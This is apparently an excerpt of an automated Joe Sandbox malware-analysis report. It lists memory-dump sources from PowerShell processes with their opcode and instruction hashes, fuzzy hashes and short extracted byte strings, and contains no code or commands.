                                                                                                          • Instruction ID: 847525d116f1a3cf48279be03863b4411c20bfced1fe00b6fe1ff036204b0937
                                                                                                          • Opcode Fuzzy Hash: c8ec88cfe9dae0899445175919730d71b364256e9155d2adc42ee19b3b58ff8d
                                                                                                          • Instruction Fuzzy Hash: 9FE1C330A08A4D8FEBA8DF68C8557E977D1FF54310F14426EE84DC72A5CF74A9418B82
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1919388869.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: H9MP
                                                                                                          • API String ID: 0-2061635949
                                                                                                          • Opcode ID: 2ab1aadafa8f7bb71c55033bcdd25490cd79cc3ee92fce1c396054921536f839
                                                                                                          • Instruction ID: 64cb19a8b96ade7f1bfe5e039c37a2921fb472ef48a64927950662119961b57e
                                                                                                          • Opcode Fuzzy Hash: 2ab1aadafa8f7bb71c55033bcdd25490cd79cc3ee92fce1c396054921536f839
                                                                                                          • Instruction Fuzzy Hash: 1BE19330A09A4D8FEBA8DF28C895BE977D1FF54300F50426EE85DC73A5DB34A9458B81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1919388869.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: H9MX
                                                                                                          • API String ID: 0-1949931871
                                                                                                          • Opcode ID: a90bfa3cd0ce7223dc25b47aa6fe585767fc5682109d2a7776e4558f8bcf73d9
                                                                                                          • Instruction ID: 0a2cfdda1588b0bc6949446595b29d28b2d7ba331148c020a37e2253fac371fd
                                                                                                          • Opcode Fuzzy Hash: a90bfa3cd0ce7223dc25b47aa6fe585767fc5682109d2a7776e4558f8bcf73d9
                                                                                                          • Instruction Fuzzy Hash: 90B1A330609B4D8FDB69DF28C8957E93BE1EF55310F04426EE84DC72A6CB349945CB82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8ab9a81b1733ab1f0eb641c063acbd99765c21640903fbfefb850df84f99c508
                                                                                                          • Instruction ID: 01762868aaa71babeb64dcef1e8c7f2cfd3076297b20d7c72f0fbd1836e76240
                                                                                                          • Opcode Fuzzy Hash: 8ab9a81b1733ab1f0eb641c063acbd99765c21640903fbfefb850df84f99c508
                                                                                                          • Instruction Fuzzy Hash: F4125832B0EB990FE7A59B7848696B87BD1EF5A210F0905FED05CC71E3DE19AC058781
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1919388869.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4e34e52de0023babe56f76fdfd79fcb5a7e3cf6e867972ae90d9485239495c90
                                                                                                          • Instruction ID: 358eb4d05d84a86a59beef17120e2e16ae7460d859eb6755275afb8d16932654
                                                                                                          • Opcode Fuzzy Hash: 4e34e52de0023babe56f76fdfd79fcb5a7e3cf6e867972ae90d9485239495c90
                                                                                                          • Instruction Fuzzy Hash: FEF14330A19A4D8FDF98DF58C465EAD7BF1FFA8300F15466AE409D72A5CA34E841CB81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5706cfb99f56cb89a40dc41eedd3aef659ab3e315985bafce65c99098907728e
                                                                                                          • Instruction ID: 378085873bf1a2ae545516cd97931f5ce11318b46afc4f6c5ee2b53ecb706e6b
                                                                                                          • Opcode Fuzzy Hash: 5706cfb99f56cb89a40dc41eedd3aef659ab3e315985bafce65c99098907728e
                                                                                                          • Instruction Fuzzy Hash: 62E10622B0EBDA0FE76A977848665B47BE1EF5A310B0E01FED099C71F3DD1968058781
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c54d78646cdb27cb15c9c0dfbf3dd92f92909060f110bd90525a6997332a4d2d
                                                                                                          • Instruction ID: f40693004acd96dd7a50a1529f1cb6200952f7c26d2bbd22fae63386ffa33141
                                                                                                          • Opcode Fuzzy Hash: c54d78646cdb27cb15c9c0dfbf3dd92f92909060f110bd90525a6997332a4d2d
                                                                                                          • Instruction Fuzzy Hash: B4F12772B0EB9D1FE765977848652687BD2EF99210F1900FED09CC71E3DE28AC458781
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a0ee8ff6669a7f1994879b107551998a8816ca2b9ded35a26693186b64f09af7
                                                                                                          • Instruction ID: 169c9e692887fd297fa0182cfb17989bd7dd8686051464a54856a80dc170e93a
                                                                                                          • Opcode Fuzzy Hash: a0ee8ff6669a7f1994879b107551998a8816ca2b9ded35a26693186b64f09af7
                                                                                                          • Instruction Fuzzy Hash: 39E16832B0EB9D1FE7A49B68446567877D2EF99310F0900BED05CC71E3DE29AD458B81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6d88d0d6fb931058010404ca56df190174512be71e8039c96e1623fc5229d8f1
                                                                                                          • Instruction ID: 3664398c34a06e8577d05a432f19767f32d27a428ed0624baabcf50f1616116f
                                                                                                          • Opcode Fuzzy Hash: 6d88d0d6fb931058010404ca56df190174512be71e8039c96e1623fc5229d8f1
                                                                                                          • Instruction Fuzzy Hash: A1A12332B0EA9E4FEBA5DB7858745B97BD1EF59220B0901BBD44DC71E3DE19AC008781
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1919388869.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 693163dc8b1e6401ac08d22586e987234d3bcc412a4f3f965dffa91638bdccdc
                                                                                                          • Instruction ID: 0e54264b7042af43d6f552f18fa916edb296003a399b8da086091636b04a6769
                                                                                                          • Opcode Fuzzy Hash: 693163dc8b1e6401ac08d22586e987234d3bcc412a4f3f965dffa91638bdccdc
                                                                                                          • Instruction Fuzzy Hash: 7D61043260E7894FEB56DB2CD8A19A47BE0EF9632470502BFD0C9C71B3D925A846C751
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3b48d5c2b62cee64dec7bbe2e8458851920ccc55040a7966c70ed15fe64475a4
                                                                                                          • Instruction ID: 060dbd52c6a0ac104c8ab4080b5959b6e9e117dd67ba09805d1eb2540cb1eb9f
                                                                                                          • Opcode Fuzzy Hash: 3b48d5c2b62cee64dec7bbe2e8458851920ccc55040a7966c70ed15fe64475a4
                                                                                                          • Instruction Fuzzy Hash: 17512832B0EBC94FDB62DBB898645B47BE1DF5A214B0900FBD448C71E3D918AD49C791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69b2a42a19ab20e71caf0eb4e18ce80280261f2e1302ed913f20af0fd25cbf1c
                                                                                                          • Instruction ID: e8d5dc0a4a1b94ebb1a1cfb4818f646feb29ff14b8f0df6a9680e88fc279ab8b
                                                                                                          • Opcode Fuzzy Hash: 69b2a42a19ab20e71caf0eb4e18ce80280261f2e1302ed913f20af0fd25cbf1c
                                                                                                          • Instruction Fuzzy Hash: 2651E532B0EBDD5FDB629B7848605A57FB1EF5A210B0900EBD498C70E3DE14AD09C792
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 496c6d2aa70be3de4ff057588823509c3d0216907867a5259fd8dc3caac5fd2d
                                                                                                          • Instruction ID: e88b885ebf9dc5ce367d6d124f55a2c1e460212ed3d757312279e5588eafedfd
                                                                                                          • Opcode Fuzzy Hash: 496c6d2aa70be3de4ff057588823509c3d0216907867a5259fd8dc3caac5fd2d
                                                                                                          • Instruction Fuzzy Hash: 43310922F1FAEE8BF7759BB818711F966C1AF5D614B5900BAD45DC31E3DD086C004785
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e848f5535ca6ff6c177dc2865a88ff1c00eea536516ef398b0b541fac582a982
                                                                                                          • Instruction ID: 1eba9b0797664bb27e01f6ac88d454a1b165dbec2df4d40addbf076840e69ce9
                                                                                                          • Opcode Fuzzy Hash: e848f5535ca6ff6c177dc2865a88ff1c00eea536516ef398b0b541fac582a982
                                                                                                          • Instruction Fuzzy Hash: 9831C432A0EBD90FEB62DBB884A45747BE1EF5A224B0904FAD458C71F3C915AC09C741
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4cfd53f8f764f6f609c82586b792ed811ad5bfb772639e6245009ba3690412b2
                                                                                                          • Instruction ID: 6f1309a53c8c6c092db713d7eb33be47a65dd2aebe59da0c1bc4bbb7546a80c5
                                                                                                          • Opcode Fuzzy Hash: 4cfd53f8f764f6f609c82586b792ed811ad5bfb772639e6245009ba3690412b2
                                                                                                          • Instruction Fuzzy Hash: 0D21E522F1FADE0BE7B59BB8147227466D2EF98350B5E00BED05CC71E3DD19AC014A81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1919388869.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6d416afc8a4f8a9c27efdfdc747e1c8fbd6b61667f392def717d813fe5d557e4
                                                                                                          • Instruction ID: df6a73a563597fe29e9d4d946ded34aea161ae26767c2632c2fc617378ff1923
                                                                                                          • Opcode Fuzzy Hash: 6d416afc8a4f8a9c27efdfdc747e1c8fbd6b61667f392def717d813fe5d557e4
                                                                                                          • Instruction Fuzzy Hash: 9C315E30A1924E8EFBB49F54CC66BF936D0FF05319F41023AD44DD62B2CA382A85CA11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a4a6e6bdf0c583e53f045fc557f3bfa00ef5216671b27dcec8ddb37b5ae4e424
                                                                                                          • Instruction ID: ab1179479d1c99b773eb21a180c32a36eaf614789178e158a6ba6293f8f01a64
                                                                                                          • Opcode Fuzzy Hash: a4a6e6bdf0c583e53f045fc557f3bfa00ef5216671b27dcec8ddb37b5ae4e424
                                                                                                          • Instruction Fuzzy Hash: E4210263F1F6DA0FE3A1B77808691646BE1AF6A654B0900FEC098CB0E3DC1859098791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1919388869.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                          • Instruction ID: bebaf9996ac909cbb8aaac519f01479eb025c9790b7e22ebd85182c23eed60cb
                                                                                                          • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                          • Instruction Fuzzy Hash: FB01A73020CB0C4FDB48EF4CE051AA9B3E0FF95320F10056DE58AC36A5D632E882CB41
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5835955a1440476f132ae482d602b29ef5ef48082978297dcaf5de91eda8a54b
                                                                                                          • Instruction ID: fdf4c1e5f54501f676962e50e8f0dc3416192e4d73980b06a8c273b1f3114477
                                                                                                          • Opcode Fuzzy Hash: 5835955a1440476f132ae482d602b29ef5ef48082978297dcaf5de91eda8a54b
                                                                                                          • Instruction Fuzzy Hash: A4F02737B5EA0E0AEBA4976C18155F9B3C2DFC8132B561177D15EC3195ED11A8164A80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1920036116.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e72bd37322a1ce63eb2aa900b966ef63217b2325a2e96ff83573d9662a5d417c
                                                                                                          • Instruction ID: 031e1a98b8c201bf88d3c8002df6daf9667b47fe5b450a97ea3aedd39820069a
                                                                                                          • Opcode Fuzzy Hash: e72bd37322a1ce63eb2aa900b966ef63217b2325a2e96ff83573d9662a5d417c
                                                                                                          • Instruction Fuzzy Hash: E0E0DF33F0EB190AFBACAA6C38625F9B3D1DF85120745087FD14FC2487E81AAC160686
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2027167044.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_4460000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3acbc748d339b06b83e208c2b209d161ac84eb64a951e58daceac4b11f502ff6
                                                                                                          • Instruction ID: 591ccc315318ae941a3d4fd7d5ad8ef1081afac770be87e9c09c44bc1d844e99
                                                                                                          • Opcode Fuzzy Hash: 3acbc748d339b06b83e208c2b209d161ac84eb64a951e58daceac4b11f502ff6
                                                                                                          • Instruction Fuzzy Hash: 91B13170E00209CFDF14CFA9D98579EBBF2AF48314F14852AD856A7354EB74A846CB42
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2027167044.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_4460000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 303edb1911dfb3594aeaca35e75b573adc7e206163f756b24f810ed5603843d3
                                                                                                          • Instruction ID: 194769d3c98f558d2bd75142060602c412d8ae61ddd4e77ce4ac0e6ca55ac495
                                                                                                          • Opcode Fuzzy Hash: 303edb1911dfb3594aeaca35e75b573adc7e206163f756b24f810ed5603843d3
                                                                                                          • Instruction Fuzzy Hash: 11B11070E002098FDF14CFA9E98579EBBF2AB49314F14852AD456E7394EB74A845CB82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2027167044.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_4460000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cab468b145262b88888cd57ce86b4c72bf6d84c308f74e1bec6c407b45e73326
                                                                                                          • Instruction ID: acff9146f4b7902a5cf1f8c3a3c1047a6c0e776181450a88eca7612533f33420
                                                                                                          • Opcode Fuzzy Hash: cab468b145262b88888cd57ce86b4c72bf6d84c308f74e1bec6c407b45e73326
                                                                                                          • Instruction Fuzzy Hash: ED41A075A002009FDB18DF24C894AAE7BF2FF89354F04486AE957EB7A0CB74AC45CB51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (f1l$(f1l$(f1l$(f1l$(f1l$(f1l$(f1l$(f1l$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$tPdq$tPdq$x."k$-"k
                                                                                                          • API String ID: 0-652917230
                                                                                                          • Opcode ID: 93267c95868f3d051039abf46c5ca609c2fb07dd74b953b8444a9779c73ab535
                                                                                                          • Instruction ID: 7545ed89003634eb11c58771d1cb5af1408fc98c275fc7620230ec29c2085f3d
                                                                                                          • Opcode Fuzzy Hash: 93267c95868f3d051039abf46c5ca609c2fb07dd74b953b8444a9779c73ab535
                                                                                                          • Instruction Fuzzy Hash: 7782D6B4E20215CFDB24CBA8C855B6ABBB2FF85304F1480AAD9059B785CB75DD81CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                          • API String ID: 0-1712999189
                                                                                                          • Opcode ID: 49c6b945ae47493ddd4bfb9a1d9a7a9b83d9ddd707e9c2c3c7b87435a007e9b3
                                                                                                          • Instruction ID: 64b80c44b8981353ae156cb0ea8304be5806dece7dbf093d4ee7fb7b670d0fb2
                                                                                                          • Opcode Fuzzy Hash: 49c6b945ae47493ddd4bfb9a1d9a7a9b83d9ddd707e9c2c3c7b87435a007e9b3
                                                                                                          • Instruction Fuzzy Hash: 18321AB1B242078FCB248F69C85966BBBE2EFC5314F14806BD945CB281DB75D9C1C7A1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (f1l$(f1l$(f1l$(f1l$(f1l$(f1l$4'dq$4'dq$4'dq$4'dq
                                                                                                          • API String ID: 0-1939410497
                                                                                                          • Opcode ID: e1f679e62d57a98dfe1a0fc8d05e1081147fc0fbb718e8533a4e22506a702994
                                                                                                          • Instruction ID: 1febbff973a61859ae86b2ca5e8d70bcd143d193bc3a9becb9e9278b21ab75c3
                                                                                                          • Opcode Fuzzy Hash: e1f679e62d57a98dfe1a0fc8d05e1081147fc0fbb718e8533a4e22506a702994
                                                                                                          • Instruction Fuzzy Hash: F86280B4A10209CFDB14CB99C485B5ABBF2EF85704F24C06AE9069F755CB76EC81CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$84/l$84/l$tPdq$tPdq$$dq$$dq$$dq
                                                                                                          • API String ID: 0-3588135489
                                                                                                          • Opcode ID: 89daef6ac629cdf18ffdd4734a4ee75fd4aabf2870c64a63667d8a6bbc49ad3f
                                                                                                          • Instruction ID: 781a4fb79d6389727dffc6684fef61aececa530b136b8dea426de7184d57dca4
                                                                                                          • Opcode Fuzzy Hash: 89daef6ac629cdf18ffdd4734a4ee75fd4aabf2870c64a63667d8a6bbc49ad3f
                                                                                                          • Instruction Fuzzy Hash: 83A15BB1B252469FC725DF68C848667BFB2EF86210F19909BD844DB283CB31CD85C7A1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x."k$-"k
                                                                                                          • API String ID: 0-797196289
                                                                                                          • Opcode ID: 2ba7be57abb51fa93f27272108c7bcfc1f1471f9b15fc3319113e79aca6c5f51
                                                                                                          • Instruction ID: a5d8a6cfa01dfcb1e49ac1bc9fccb9c1d146c5138bc9020bd41a73f30a28e1a1
                                                                                                          • Opcode Fuzzy Hash: 2ba7be57abb51fa93f27272108c7bcfc1f1471f9b15fc3319113e79aca6c5f51
                                                                                                          • Instruction Fuzzy Hash: 7FD181B0A102098FC708DBA8D495BAEBBB2EF88308F14C56AD5056F795DB75DC81CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (f1l$(f1l$4'dq$4'dq$x."k$x."k$-"k
                                                                                                          • API String ID: 0-2409181525
                                                                                                          • Opcode ID: acd51c0cd33f473f6000ad9b54043876c6583334abb311c6485eac166009f894
                                                                                                          • Instruction ID: 4bab244976e63d17a670a1bce66e6f07818ad40179f45a33d3194d8daa1c89e0
                                                                                                          • Opcode Fuzzy Hash: acd51c0cd33f473f6000ad9b54043876c6583334abb311c6485eac166009f894
                                                                                                          • Instruction Fuzzy Hash: E2F19470A101159FDB14DB68CC95F6EBBB3EF84304F1080A9E90AAF795CB759D818F91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$4'dq$x."k$-"k
                                                                                                          • API String ID: 0-3986131767
                                                                                                          • Opcode ID: 050c6b961c01b56ed6b99e6376347cf4ef300adcfc61ee512f4d089ade3aa458
                                                                                                          • Instruction ID: 13b33b7857cc503536653ddad505cfba46ffe0992bfd5c863aba591e3f13e916
                                                                                                          • Opcode Fuzzy Hash: 050c6b961c01b56ed6b99e6376347cf4ef300adcfc61ee512f4d089ade3aa458
                                                                                                          • Instruction Fuzzy Hash: 66B18FB4A20209DFC714CB68D485BAEBBB2EF88308F14C15AD9056F395DB75EC81CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (f1l$(f1l$4'dq$4'dq
                                                                                                          • API String ID: 0-2461734995
                                                                                                          • Opcode ID: 2d89bfef12392d0c25e1ee8b63b54ba9290b0719d508d2ac3493ae510684e9f2
                                                                                                          • Instruction ID: 8c0eb27c384f412d7655d14b34f16dc611216a23bf9e01ed3c26d01158211535
                                                                                                          • Opcode Fuzzy Hash: 2d89bfef12392d0c25e1ee8b63b54ba9290b0719d508d2ac3493ae510684e9f2
                                                                                                          • Instruction Fuzzy Hash: 9142AFB5A10209CFDB10CB99C485B59BBF2EF84704F24C09AE909AF355CB76EC85CB90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$_$$dq
                                                                                                          • API String ID: 0-775206189
